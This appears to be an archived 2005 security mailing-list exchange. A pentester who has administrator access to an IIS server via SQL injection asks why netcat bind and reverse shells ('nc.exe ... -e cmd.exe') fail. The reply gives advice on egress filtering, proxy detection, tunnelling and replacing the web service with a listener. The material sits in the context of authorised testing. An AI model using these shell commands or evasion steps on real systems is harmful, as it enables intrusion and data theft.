From: Omar Herrera (oherrera@prodigy.net.mx)
Date: Wed Jun 01 2005 - 10:38:33 EDT
Most probably a firewall there, blocking your traffic. The fact that you can't see open ports with netcat from the outside is not surprising (the firewall might be allowing only ports 80 and 443).
But good egreess filters are harder to find. Yet, there could be outbound filters also for ports like 443 and 53, or worse, a stateful engine allowing only outbound traffic that is related to valid established connections (there is no good reason for a webserver to connecto to port 443 in the Internet, in most cases, and address resolution might be restricted to local name serververs).
Just to make sure, try port 80 (from the web server to your machine). It could be also that there are no egress filters or tight stateful rules in place, but just an application proxy. While testing port 80 try sending just any traffic first and then, in another connection, attempt a valid HTTP request, like:
> nc x.x.x.x 80
GET / HTTP/1.1
HOST: x.x.x.x
(enter enter)
If you are not able to establish the first connection but you can do it with a valid http request, then you might assume that there are proxies filtering some ports. You might then need tools like httptunnel to get out, back to your machine. Proxies hold requests until they verify that they are valid.
Another indication of a proxy sitting there is that nc will report the connection as established but you won´t see any packet arriving at your machine (until the proxy validates the request and forwards the traffic), use -vv option with netcat to test for this.
If neither attempts are successful you still have some options, but it might require you to script something so that you don't get yourself locked out (also, make sure that your contract allows this; it will result in an obvious DoS). You could just shut down the web server and put netcat or another tool listening on ports 80/443 on the web server. Even with proxies there (you will still need to put the traffic in a tunnel in this case) you can be almost sure that you will be able to connect from the outside to this server on those ports.
Regards,
Omar
----- Mensaje original -----
De: intel96 <intel96@bellsouth.net>
> To All,
>
> I am conducting a pentest and I have been able to upload netcat to
> the
> web server (IIS 6.0 - with ports 80/443 open) via ftp. I have
> tried to
> establish a shell both ways, but cannot get it to work:
>
> On the web server I first tried: nc.exe –l –p 8000 –e cmd.exe
>
> When I tried to connect to port 8000 on the web server I received
> a
> timeout on my side. I have also tried this with port 53 and it
> also did
> not work.
>
> I than tried: nc.exe –nv my_public_ip_address 443 -d –e cmd.exe
>
> This did not work either. I did not see the remote system trying
> to
> connect to my system via my logs. I have access to upload anything
> to
> the system and run most commands via sql injections. I have
> administrator level access on the system at this time.
>
> Any ideas on how I can get this shell to work? Or there any other
> commands that may provide me more access or allow me to dump the
> database?
> Thanks,
>
> Intel96
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:54:22 EDT